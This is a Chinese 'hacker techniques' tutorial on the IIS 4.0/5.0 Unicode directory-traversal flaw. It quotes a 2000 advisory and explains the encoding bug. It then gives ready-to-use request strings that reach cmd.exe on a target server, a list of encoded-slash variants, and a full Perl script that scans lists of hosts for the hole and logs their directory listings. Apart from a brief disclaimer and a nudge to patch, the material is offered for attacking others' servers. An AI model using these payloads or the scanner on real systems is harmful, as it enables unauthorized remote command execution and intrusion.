当前位置:主页 > 文章技巧
黑客技巧--深入UNICODE编码漏洞(一)
日期:2017-09-12 浏览量:

1

  这并不是什么权威教材,只适合菜鸟了解win9x、NT存在的不安全面,切莫用此方法在国内做尝试,如果你偏要如此,那么由此引起的一切法律后果由你自己负责。

2000年10月17日中联绿盟发布了以下的安全公告:
微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞
远程漏洞:是
本地漏洞:是
发布日期:2000年10月17日
更新日期:2000年10月17日
受影响的版本:
Microsoft IIS 5.0
+ Microsoft Windows NT 2000
Microsoft IIS 4.0
+ Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0
不受影响的版本:
漏洞描述:
微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代"/"和"\"而能利用"../"
目录遍历的漏洞。
未经授权的用户可能利用IUSR_machinename账号的上下文空间访问任何已知
的文件。该账号在默认情况下属于Everyone 和Users组的成员,因此任何与
Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都能被删除,
修改或执行,就如同一个用户成功登陆所能完成的一样。
测试方法:(以下的程序或方法可能具有攻击性,如用于非法用途,后果自负!)
%c1%1c../path/solo.txt
%c0%af = /
%c1%9c = 解决方案:
该漏洞补丁随微软安全公告MS00-057一起发布
()
可以从如下地址下载补丁:
IIS 4.0

IIS 5.0

—————————————————————————————————
(以上为原文)
—————————————————————————————————
  该漏洞一发布后,紧接而来的是众多NT网络服务器惨遭黑手,可以说,到目前为止,网络里仍存在此漏洞的NT服务器至少有30%,而这些站点的管理员是白痴还是认为该漏洞不值得注意??看来是不曾被黑不落泪,NT站的管理员们,看完以下的方法,你快点给你的NT服务器打补丁吧。

一、UNICODE漏洞的原理

  此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。

  中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/‘
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘\‘

  在NT4中/编码为%c1%9c

  在英文版里:WIN2000英文版%c0%af

  但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,具体情况本人未做详细的证实:
%c1%pc
%c0%9v
%c0%qf
%c1%8s
%e0%80%af
%f0%80%80%af
%fc%80%80%80%80%af

  或许是什么日文版、韩文版之类,win2000 Terminal版有兴趣的朋友可以试试。

2


二、UNICODE漏洞的检测

  以下均以中文版WIN2K为例,如果是其他NT版本,按上面所述的编码替换以下代码中的%c1%1c最简单的检测方法:
比如说有一IP地址为X.X.X.X的WIN2K主机,我们可以在地址栏输入x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir如果存在此漏洞的话,我们便可以看到以下的内容:(例子假设SCRIPTS目录里无文件)
Directory of C:\inetpub\scripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 ..

  这是我们在很多经验交谈中常看到大家使用的方法,实际上我们也可以改为这样127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/r+dir即r=c 这个字母的取代,在本文发表之前,网络里没有介绍过,关于r这字母可以等效于c,我们可以通过cmd/?可以得到解释。

  当然,如果目标主机的管理员把该目录删除掉,我们就无法看到了,但是还有以下的目录是同样可以用来测试的。
%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

运行后,我们可以看到
Directory of c:\program files\common files\system\msadc
2000-08-06 19:16
.
2000-08-06 19:16
..
(以下内容略)
19 File(s) 1,233,840 bytes
2 Dir(s) 6,290,644,992 bytes free

  如果漏洞和目录同时存在的话,你就可以在WEB页上看到相对应的目录里的一切内容。这仅是对单一目标主机的漏洞检测,如果想对某一IP段上的NT主机做UNICODE漏洞的检测,我们就需要使用类似以下的扫描软件。以下的源码是外国黑客写的,当然就只扫描英文版的NT,要扫描中文版的,需要做相应的修改。

#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing homework in my room.
#it will go through a list of sites and check if it gives a directory listing for the new IIS hole
#it checks for both %c0%af and %c1%9c
#perhaps a public script to do some evil stuff with this exploit later... h0h0h0
#werd: all of rsh, 0x7f, hackweiser, rain forest puppy for researching the hole =]
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $def = new LWP::UserAgent;
my @host;
print "root shell hackers\n";
print "iis cmd hole scanner\n";
print "coded by piffy\n";
print "\nWhat file contains the hosts: ";
chop (my $hosts=);
open(IN, $hosts) || die "\nCould not open $hosts: $!";
while ()
{
$host[$a] = $_;
chomp $host[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print "ph34r, scan started";
while ($a < $b)
{
my $url="http://$host[$a]/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request(‘GET‘, $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
&second()
}

sub second() {
my $url2="http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request(‘GET‘, $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
$a++;
}

  以上的pl程序你可以在本机运行(当然需要安装PERL),也可以在远程的
服务器上运行。

【责任编辑:wuhanman】

作者:badboy责任编辑:)

天极新媒体 最酷科技资讯

扫码赢大奖

AOC AG273QCG 产品信息

相关文章:
·水果别买PLU编码8开头的 买进口食品这些技巧要掌
·怎样导出高清视频 Xvid编码设置教程
·Win10卸载软件Skype错误代码2503的解决技巧
·调查显示美国半数高薪工作需要拥有的一种技能
·对建设项目投资项(或者成本项)信息进行编码
→ 特别推荐
水果别买PLU编码8开头
怎样导出高清视频
Win10卸载软件Skype错误
调查显示美国半数高
对建设项目投资项(
Docker社区核心成员D
《智能电视娱乐操控
栅格结构数据获取的
Css技巧:模块化编码
探秘最强大脑速成法
逆回购操作方法与技
矢量数据结构的编码
ffmpeg与H264编码 使用技
MYSQL数据库设计的一些
详解VB.NET动态编码技
→ 热点TOP10
[技巧]神秘代码
黑客技巧--深入
拉菲最新防伪
《纽约时报》
免费QQ空间五级
总结ERP之供应
[技巧] 如何在
C语言半协程编
单片机开发应
谈媒介语言建

友情链接/网站合作咨询: